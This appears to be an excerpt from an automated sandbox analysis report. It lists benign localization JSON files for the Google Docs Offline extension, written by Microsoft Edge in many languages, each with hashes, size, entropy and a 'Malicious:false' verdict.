                                                                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
